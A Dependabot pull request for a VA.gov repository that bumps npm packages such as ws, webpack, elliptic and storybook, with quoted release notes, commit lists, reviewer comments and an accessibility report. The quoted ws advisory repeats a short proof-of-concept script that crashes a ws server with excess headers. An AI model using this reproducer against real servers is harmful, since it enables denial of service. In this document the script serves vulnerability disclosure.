Bump the npm_and_yarn group across 5 directories with 23 updates

[dependabot]

Bumps the npm_and_yarn group with 3 updates in the / directory: elliptic, webpack and ws.
Bumps the npm_and_yarn group with 11 updates in the /docroot/design-system directory:

Package	From	To
braces	3.0.2	3.0.3
cross-spawn	7.0.3	7.0.6
nanoid	3.3.6	3.3.8
elliptic	6.5.4	6.6.1
micromatch	4.0.5	4.0.8
webpack	5.83.1	5.97.1
ws	8.14.2	8.18.0
ws	6.2.2	8.18.0
ws	7.5.9	8.18.0
storybook	7.4.6	8.5.2
body-parser	1.20.1	1.20.3
express	4.18.2	4.21.2
markdown-to-jsx	7.3.2	7.7.3

Bumps the npm_and_yarn group with 6 updates in the /docroot/modules/custom/va_gov_graphql/assets/explorer directory:

Package	From	To
braces	3.0.2	3.0.3
cross-spawn	7.0.3	7.0.6
micromatch	4.0.4	4.0.8
webpack	5.88.2	5.97.1
@graphql-tools/url-loader	7.16.19	7.17.18
dset	3.1.2	3.1.4

Bumps the npm_and_yarn group with 14 updates in the /docroot/themes/custom/vagovclaro directory:

Package	From	To
braces	3.0.2	3.0.3
cross-spawn	7.0.3	7.0.6
nanoid	3.3.6	3.3.8
elliptic	6.5.4	6.6.1
micromatch	4.0.5	4.0.8
webpack	5.76.2	5.97.1
ws	8.11.0	8.17.1
socket.io-client	4.6.1	4.8.1
socket.io	4.6.1	4.8.1
ip	2.0.0	removed
socks	2.7.1	2.8.3
send	0.16.2	0.19.1
browser-sync	2.29.0	3.0.3
axios	1.6.1	1.7.4

Bumps the npm_and_yarn group with 3 updates in the /scripts/cd_metrics directory: braces, cross-spawn and micromatch.

Updates elliptic from 6.5.4 to 6.6.1

Commits

• 9b77436 6.6.1
• 04cb6f5 Merge commit from fork
• b8a7edd 6.6.0
• 34c8534 fix: signature verification due to leading zeros
• 3e46a48 6.5.7
• accb61e lib: DER signature decoding correction
• 03e06e1 6.5.6
• 7ac5360 Merge commit from fork
• 7570078 6.5.5
• 206da2e lib: lint
• Additional commits viewable in compare view

Updates webpack from 5.88.2 to 5.97.1

Release notes

Sourced from webpack's releases.

v5.97.1

Bug Fixes

• Performance regression
• Sub define key should't be renamed when it's a defined variable

v5.97.0

Bug Fixes

• Don't crash with filesystem cache and unknown scheme
• Generate a valid code when output.iife is true and output.library.type is umd
• Fixed conflict variable name with concatenate modules and runtime code
• Merge duplicate chunks before
• Collisions in ESM library
• Use recursive search for versions of shared dependencies
• [WASM] Don't crash WebAssembly with Reference Types (sync and async)
• [WASM] Fixed wasm loading for sync and async webassembly
• [CSS] Don't add [uniqueName] to localIdentName when it is empty
• [CSS] Parsing strings on Windows
• [CSS] Fixed CSS local escaping

New Features

• Added support for injecting debug IDs
• Export the MergeDuplicateChunks plugin
• Added universal loading for JS chunks and JS worker chunks (only ES modules)
• [WASM] Added universal loading for WebAssembly chunks (only for async WebAssembly)
• [CSS] Allow initial CSS chunks to be placed anywhere - the output.cssHeadDataCompression option was deleted
• [CSS] Added universal loading for CSS chunks
• [CSS] Parse ICSS @value at-rules in CSS modules
• [CSS] Parse ICSS :import rules in CSS modules
• [CSS] Added the url and import options for CSS
• [CSS] Allow to import custom properties in CSS modules

Performance

• Faster Queue implementation, also fixed queue iterator state in dequeue method to ensure correct behavior after item removal

v5.96.1

Bug Fixes

• [Types] Add @types/eslint-scope to dependencieS
• [Types] Fixed regression in validate

v5.96.0

Bug Fixes

• Fixed Module Federation should track all referenced chunks
• Handle Data URI without base64 word
• HotUpdateChunk have correct runtime when modified with new runtime

... (truncated)

Commits

• 3612d36 chore(release): 5.97.1
• eb7ac6f fix: perf regression
• 554be24 fix: sub define key should't be renamed when it's a defined variable
• 5e0e780 refactor: issue #19030
• 58fb035 fix: sub define key should't be renamed when it's a defined variable
• af1fd12 perf: regression
• 34f19cb fix: package.json
• 0ec7f5d refactor: issue #19030
• 5e7b8a2 fix: package.json
• 644f1d1 refactor: no extra work for CSS unescaping
• Additional commits viewable in compare view

Updates ws from 8.13.0 to 8.18.0

Release notes

Sourced from ws's releases.

8.18.0

Features

• Added support for Blob (#2229).

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits

• 976c53c [dist] 8.18.0
• 59b9629 [feature] Add support for Blob (#2229)
• 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
• 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• Additional commits viewable in compare view

Updates braces from 3.0.2 to 3.0.3

Commits

• 74b2db2 3.0.3
• 88f1429 update eslint. lint, fix unit tests.
• 415d660 Snyk js braces 6838727 (#40)
• 190510f fix tests, skip 1 test in test/braces.expand
• 716eb9f readme bump
• a5851e5 Merge pull request #37 from coderaiser/fix/vulnerability
• 2092bd1 feature: braces: add maxSymbols (https://github.com/micromatch/braces/issues/...
• 9f5b4cf fix: vulnerability (https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727)
• 98414f9 remove funding file
• 665ab5d update keepEscaping doc (#27)
• Additional commits viewable in compare view

Updates cross-spawn from 7.0.3 to 7.0.6

Changelog

Sourced from cross-spawn's changelog.

7.0.6 (2024-11-18)

Bug Fixes

• update cross-spawn version to 7.0.5 in package-lock.json (f700743)

7.0.5 (2024-11-07)

Bug Fixes

• fix escaping bug introduced by backtracking (640d391)

7.0.4 (2024-11-07)

Bug Fixes

• disable regexp backtracking (#160) (5ff3a07)

Commits

• 77cd97f chore(release): 7.0.6
• 6717de4 chore: upgrade standard-version
• f700743 fix: update cross-spawn version to 7.0.5 in package-lock.json
• 9a7e3b2 chore: fix build status badge
• 0852683 chore(release): 7.0.5
• 640d391 fix: fix escaping bug introduced by backtracking
• bff0c87 chore: remove codecov
• a7c6abc chore: replace travis with github workflows
• 9b9246e chore(release): 7.0.4
• 5ff3a07 fix: disable regexp backtracking (#160)
• Additional commits viewable in compare view

Updates nanoid from 3.3.6 to 3.3.8

Changelog

Sourced from nanoid's changelog.

3.3.8

• Fixed a way to break Nano ID by passing non-integer size (by @​myndzi).

3.3.7

• Fixed node16 TypeScript support (by Saadi Myftija).

Commits

• 3044cd5 Release 3.3.8 version
• 4fe3495 Update size limit
• d643045 Fix pool pollution, infinite loop (#510)
• 89d82d2 Release 3.3.7 version
• 5022c35 Update dual-publish
• 3e7a8e5 Remove benchmark from CI for v3
• d356144 Fix CI for v3
• 37b25df Move to pnpm 8
• See full diff in compare view

Updates elliptic from 6.5.4 to 6.6.1

Commits

• 9b77436 6.6.1
• 04cb6f5 Merge commit from fork
• b8a7edd 6.6.0
• 34c8534 fix: signature verification due to leading zeros
• 3e46a48 6.5.7
• accb61e lib: DER signature decoding correction
• 03e06e1 6.5.6
• 7ac5360 Merge commit from fork
• 7570078 6.5.5
• 206da2e lib: lint
• Additional commits viewable in compare view

Updates micromatch from 4.0.5 to 4.0.8

Release notes

Sourced from micromatch's releases.

4.0.8

Ultimate release that fixes both CVE-2024-4067 and CVE-2024-4068. We consider the issues low-priority, so even if you see automated scanners saying otherwise, don't be scared.

Changelog

Sourced from micromatch's changelog.

[4.0.8] - 2024-08-22

• backported CVE-2024-4067 fix (from v4.0.6) over to 4.x branch

[4.0.7] - 2024-05-22

• this is basically v4.0.5, with some README updates
• it is vulnerable to CVE-2024-4067
• Updated braces to v3.0.3 to avoid CVE-2024-4068
• does NOT break API compatibility

[4.0.6] - 2024-05-21

• Added hasBraces to check if a pattern contains braces.
• Fixes CVE-2024-4067
• BREAKS API COMPATIBILITY
• Should be labeled as a major release, but it's not.

Commits

• 8bd704e 4.0.8
• a0e6841 run verb to generate README documentation
• 4ec2884 Merge branch 'v4' into hauserkristof-feature/v4.0.8
• 03aa805 Merge pull request #266 from hauserkristof/feature/v4.0.8
• 814f5f7 lint
• 67fcce6 fix: CHANGELOG about braces & CVE-2024-4068, v4.0.5
• 113f2e3 fix: CVE numbers in CHANGELOG
• d9dbd9a feat: updated CHANGELOG
• 2ab1315 fix: use actions/setup-node@v4
• 1406ea3 feat: rework test to work on macos with node 10,12 and 14
• Additional commits viewable in compare view

Updates webpack from 5.83.1 to 5.97.1

Release notes

Sourced from webpack's releases.

v5.97.1

Bug Fixes

• Performance regression
• Sub define key should't be renamed when it's a defined variable

v5.97.0

Bug Fixes

• Don't crash with filesystem cache and unknown scheme
• Generate a valid code when output.iife is true and output.library.type is umd
• Fixed conflict variable name with concatenate modules and runtime code
• Merge duplicate chunks before
• Collisions in ESM library
• Use recursive search for versions of shared dependencies
• [WASM] Don't crash WebAssembly with Reference Types (sync and async)
• [WASM] Fixed wasm loading for sync and async webassembly
• [CSS] Don't add [uniqueName] to localIdentName when it is empty
• [CSS] Parsing strings on Windows
• [CSS] Fixed CSS local escaping

New Features

• Added support for injecting debug IDs
• Export the MergeDuplicateChunks plugin
• Added universal loading for JS chunks and JS worker chunks (only ES modules)
• [WASM] Added universal loading for WebAssembly chunks (only for async WebAssembly)
• [CSS] Allow initial CSS chunks to be placed anywhere - the output.cssHeadDataCompression option was deleted
• [CSS] Added universal loading for CSS chunks
• [CSS] Parse ICSS @value at-rules in CSS modules
• [CSS] Parse ICSS :import rules in CSS modules
• [CSS] Added the url and import options for CSS
• [CSS] Allow to import custom properties in CSS modules

Performance

• Faster Queue implementation, also fixed queue iterator state in dequeue method to ensure correct behavior after item removal

v5.96.1

Bug Fixes

• [Types] Add @types/eslint-scope to dependencieS
• [Types] Fixed regression in validate

v5.96.0

Bug Fixes

• Fixed Module Federation should track all referenced chunks
• Handle Data URI without base64 word
• HotUpdateChunk have correct runtime when modified with new runtime

... (truncated)

Commits

• 3612d36 chore(release): 5.97.1
• eb7ac6f fix: perf regression
• 554be24 fix: sub define key should't be renamed when it's a defined variable
• 5e0e780 refactor: issue #19030
• 58fb035 fix: sub define key should't be renamed when it's a defined variable
• af1fd12 perf: regression
• 34f19cb fix: package.json
• 0ec7f5d refactor: issue #19030
• 5e7b8a2 fix: package.json
• 644f1d1 refactor: no extra work for CSS unescaping
• Additional commits viewable in compare view

Updates ws from 8.14.2 to 8.18.0

Release notes

Sourced from ws's releases.

8.18.0

Features

• Added support for Blob (#2229).

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits

• 976c53c [dist] 8.18.0
• 59b9629 [feature] Add support for Blob (#2229)
• 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
• 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• Additional commits viewable in compare view

Updates ws from 6.2.2 to 8.18.0

Release notes

Sourced from ws's releases.

8.18.0

Features

• Added support for Blob (#2229).

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits

• 976c53c [dist] 8.18.0
• 59b9629 [feature] Add support for Blob (#2229)
• 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
• 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• Additional commits viewable in compare view

Updates ws from 7.5.9 to 8.18.0

Release notes

Sourced from ws's releases.

8.18.0

Features

• Added support for Blob (#2229).

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits

• 976c53c [dist] 8.18.0
• 59b9629 [feature] Add support for Blob (#2229)
• 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
• 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• Additional commits viewable in compare view

Updates storybook from 7.4.6 to 8.5.2

Release notes

Sourced from storybook's releases.

v8.5.2

8.5.2

• Addon Test: Support Vitest 3 browser.test.instances field - #30309, thanks @​valentinpalkovic!
• CLI: Corrected Next.js createScript for pnpm. - #30304, thanks @​zhyd1997!

v8.5.1

8.5.1

• Addon Test: Replace interaction test -> component test - #30333, thanks @​kylegach!
• Manager: Fix escaping of single quotes in dynamic import paths - #30278, thanks @​valentinpalkovic!
• RNW-Vite: Support requires for images/fonts - #30305, thanks @​dannyhw!

v8.5.0

8.5.0

Storybook 8.5 is packed with powerful features to enhance your development workflow. This release makes it easier than ever to build accessible, well-tested UIs. Here’s what’s new:

• 🦾 Realtime accessibility tests to help build UIs for everybody
• 🛡️ Project code coverage to measure the completeness of your tests
• 🎯 Focused tests for faster test feedback
• ⚛️ React Native Web Vite framework (experimental) for testing mobile UI
• ⚛️ React 19 support
• 🎁 Storybook test early access program to level up your testing game
• 💯 Hundreds more improvements

• Addon A11y: Add conditional rendering for a11y violation number in Testing Module - #30073, thanks @​valentinpalkovic!
• Addon A11y: Add typesVersions support for TypeScript definitions in a11y package - #30005, thanks @​valentinpalkovic!
• Addon A11y: Adjust default behaviour when using with experimental-addon-test - #30162, thanks @​valentinpalkovic!
• Addon A11y: Change default element selector - #30253, thanks @​valentinpalkovic!
• Addon A11y: Create a11y test provider and revamp a11y addon - #29643, thanks @​valentinpalkovic!
• Addon A11y: Don't set a11y tag as comment in automigrations - #30257, thanks @​valentinpalkovic!
• Addon A11y: Fix skipped status handling in Testing Module - #30077, thanks @​valentinpalkovic!
• Addon A11y: Refactor environment variable handling for Vitest integration - #30022, thanks @​valentinpalkovic!
• Addon A11y: Remove warnings API - #30049, thanks @​kasperpeulen!
• Addon A11y: Run the a11y automigration on postInstall - #30004, thanks @​kasperpeulen!
• Addon A11y: Show errors of axe properly - #30050, thanks @​kasperpeulen!
• Addon A11y: Update accessibility status handling in TestProviderRender - #30027, thanks @​valentinpalkovic!
• Addon Docs: Dynamically import rehype - #29544, thanks @​valentinpalkovic!
• Addon Docs: Make new code panel opt in - #30248, thanks @​shilman!
• Addon Onboarding: Prebundle react-confetti - #29996, thanks @​yannbf!
• Addon Test: Add @vitest/coverage-v8 during postinstall if no coverage reporter is installed - #29993, thanks @​ghengeveld!
• Addon Test: Add prerequisite check for MSW - #30193, thanks @​yannbf!
• Addon Test: Add support for previewHead - #29808, thanks @​ndelangen!
• Addon Test: Add Vitest 3 support - #30181, thanks @​valentinpalkovic!
• Addon Test: Always run Vitest in watch mode internally - #29749, thanks @​JReinhold!
• Addon Test: Always use installed version of vitest - #30134, thanks @​kasperpeulen!

... (truncated)

Changelog

Sourced from storybook's changelog.

8.5.2

• Addon Test: Support Vitest 3 browser.test.instances field - #30309, thanks @​valentinpalkovic!
• CLI: Corrected Next.js createScript for pnpm. - #30304, thanks @​zhyd1997!

8.5.1

• Addon Test: Replace interaction test -> component test - #30333, thanks @​kylegach!
• Addon Test: Support Vitest 3 browser.test.instances field - #30309, thanks @​valentinpalkovic!
• Manager: Fix escaping of single quotes in dynamic import paths - #30278, thanks @​valentinpalkovic!
• RNW-Vite: Support requires for images/fonts - #30305, thanks @​dannyhw!

8.5.0

Storybook 8.5 is packed with powerful features to enhance your development workflow. This release makes it easier than ever to build accessible, well-tested UIs. Here’s what’s new:

• 🦾 Realtime accessibility tests to help build UIs for everybody
• 🛡️ Project code coverage to measure the completeness of your tests
• 🎯 Focused tests for faster test feedback
• ⚛️ React Native Web Vite framework (experimental) for testing mobile UI⚛️
• 🎁 Storybook test early access program to level up your testing game
• 💯 Hundreds more improvements

• Addon A11y: Add conditional rendering for a11y violation number in Testing Module - #30073, thanks @​valentinpalkovic!
• Addon A11y: Add typesVersions support for TypeScript definitions in a11y package - #30005, thanks @​valentinpalkovic!
• Addon A11y: Adjust default behaviour when using with experimental-addon-test - #30162, thanks @​valentinpalkovic!
• Addon A11y: Change default element selector - #30253, thanks @​valentinpalkovic!
• Addon A11y: Create a11y test provider and revamp a11y addon - #29643, thanks @​valentinpalkovic!
• Addon A11y: Don't set a11y tag as comment in automigrations - #30257, thanks @​valentinpalkovic!
• Addon A11y: Fix skipped status handling in Testing Module - #30077, thanks @​valentinpalkovic!
• Addon A11y: Refactor environment variable handling for Vitest integration - #30022, thanks @​valentinpalkovic!
• Addon A11y: Remove warnings API - #30049, thanks @​kasperpeulen!
• Addon A11y: Run the a11y automigration on postInstall - #30004, thanks @​kasperpeulen!
• Addon A11y: Show errors of axe properly - #30050, thanks @​kasperpeulen!
• Addon A11y: Update accessibility status handling in TestProviderRender - #30027, thanks @​valentinpalkovic!
• Addon Docs: Dynamically import rehype - #29544, thanks @​valentinpalkovic!
• Addon Docs: Make new code panel opt in - #30248, thanks @​shilman!
• Addon Onboarding: Prebundle react-confetti - #29996, thanks @​yannbf!
• Addon Test: Add @vitest/coverage-v8 during postinstall if no coverage reporter is installed - #29993, thanks @​ghengeveld!
• Addon Test: Add prerequisite check for MSW - #30193, thanks @​yannbf!
• Addon Test: Add support for previewHead - #29808, thanks @​ndelangen!
• Addon Test: Add Vitest 3 support - #30181, thanks @​valentinpalkovic!
• Addon Test: Always run Vitest in watch mode internally - #29749, thanks @​JReinhold!
• Addon Test: Always use installed version of vitest - #30134, thanks @​kasperpeulen!
• Addon Test: Clarify message when vitest detects missing deps - #29763, thanks @​ndelangen!
• Addon Test: Clear coverage data when starting or watching - #30072, thanks @​ghengeveld!
• Addon Test: Context menu UI - #29727, thanks @​ghengeveld!

... (truncated)

Commits

• 7dac855 Bump version from "8.5.1" to "8.5.2" [skip ci]
• 600af05 Bump version from "8.5.0" to "8.5.1" [skip ci]
• 9277067 Bump version from "8.5.0-beta.11" to "8.5.0" [skip ci]
• d8fe93a Bump version from "8.5.0-beta.10" to "8.5.0-beta.11" [skip ci]
• 426586d Bump version from "8.5.0-beta.9" to "8.5.0-beta.10" [skip ci]
• b607dbe Bump version from "8.5.0-beta.8" to "8.5.0-beta.9" [skip ci]
• 3b979ee Bump version from "8.5.0-beta.7" to "8.5.0-beta.8" [skip ci]
• 2b9f1cf Bump version from "8.5.0-beta.6" to "8.5.0-beta.7" [skip ci]
• 91f53fd Bump version from "8.5.0-beta.5" to "8.5.0-beta.6" [skip ci]
• ef9ee27 Bump version from "8.5.0-beta.4" to "8.5.0-beta.5" [skip ci]
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by storybook-bot, a new releaser for storybook since your current version.

Updates body-parser from 1.20.1 to 1.20.3

Release notes

Sourced from body-parser's releases.

1.20.3

What's Changed

Important

• deps: [email protected]
• add depth option to customize the depth level in the parser
• IMPORTANT: The default depth level for parsing URL-encoded data is now 32 (previously was Infinity). Documentation

Other changes

• chore: add support for OSSF scorecard reporting by @​inigomarquinez in expressjs/body-parser#522
• ci: fix errors in ci github action for node 8 and 9 by @​inigomarquinez in expressjs/body-parser#523
• fix: pin to [email protected] by @​wesleytodd in expressjs/body-parser#527
• deps: [email protected] by @​melikhov-dev in expressjs/body-parser#521
• Add OSSF Scorecard badge by @​bjohansebas in expressjs/body-parser#531
• Linter by @​UlisesGascon in expressjs/body-parser#534
• Release: 1.20.3 by @​UlisesGascon in expressjs/body-parser#535

New Contributors

• @​inigomarquinez made their first contribution in expressjs/body-parser#522
• @​melikhov-dev made their first contribution in expressjs/body-parser#521
• @​bjohansebas made their first contribution in expressjs/body-parser#531
• @​UlisesGascon made their first contribution in expressjs/body-parser#534

Full Changelog: expressjs/body-parser@1.20.2...1.20.3

1.20.2

• Fix strict json error message on Node.js 19+
• deps: content-type@~1.0.5
  • perf: skip value escaping when unnecessary
• deps: [email protected]

Changelog

Sourced from body-parser's changelog.

1.20.3 / 2024-09-10

• deps: [email protected]
• add depth option to customize the depth level in the parser
• IMPORTANT: The default depth level for parsing URL-encoded data is now 32 (previously was Infinity)

1.20.2 / 2023-02-21

• Fix strict json error message on Node.js 19+
• deps: content-type@~1.0.5
  • perf: skip value escaping when unnecessary
• deps: [email protected]

Commits

• 1752951 1.20.3
• 39744cf chore: linter (#534)
• b2695c4 Merge commit from fork
• ade0f3f add scorecard to readme (#531)
• 99a1bd6 deps: [email protected] (#521)
• 9478591 fix: pin to [email protected]
• 83db46a ci: fix errors in ci github action for node 8 and 9 (#523)

[github-actions]

Checking composer.lock changes...

[timcosgrove]

These are all housekeeping.

[github-actions]

Checking composer.lock changes...

[github-actions]

Checking composer.lock changes...

[timcosgrove]

Housekeeping; tests all pass.

[github-actions]

Checking composer.lock changes...

[github-actions]

Checking composer.lock changes...

[va-cms-bot]

Cypress Accessibility Violations

/user/5401

ID: link-name
Impact: serious
Tags: cat.name-role-value, wcag2a, wcag244, wcag412, section508, section508.22.a, TTv5, TT6.a, EN-301-549, EN-9.2.4.4, EN-9.4.1.2, ACT
Description: Ensure links have discernible text
Help: Links must have discernible text
Nodes:

• HTML: <a href="/user" class="toolbar-icon toolbar-icon-user trigger toolbar-item" id="toolbar-item-user" data-toolbar-tray="toolbar-item-user-tray" role="button" aria-pressed="false" style="background-color: rgb(2, 191, 231); border-bottom: 0px; color: rgb(33, 33, 33);">
  Impact: serious
  Target: #toolbar-item-user
  Summary: Fix all of the following:
  Element is in tab order and does not have accessible text

Fix any of the following:
Element does not have text that is visible to screen readers
aria-label attribute does not exist or is empty
aria-labelledby attribute does not exist, references elements that do not exist or references elements that are empty
Element has no title attribute

[dependabot]

This pull request was built based on a group rule. Closing it will not ignore any of these versions in future pull requests.

To ignore these dependencies, configure ignore rules in dependabot.yml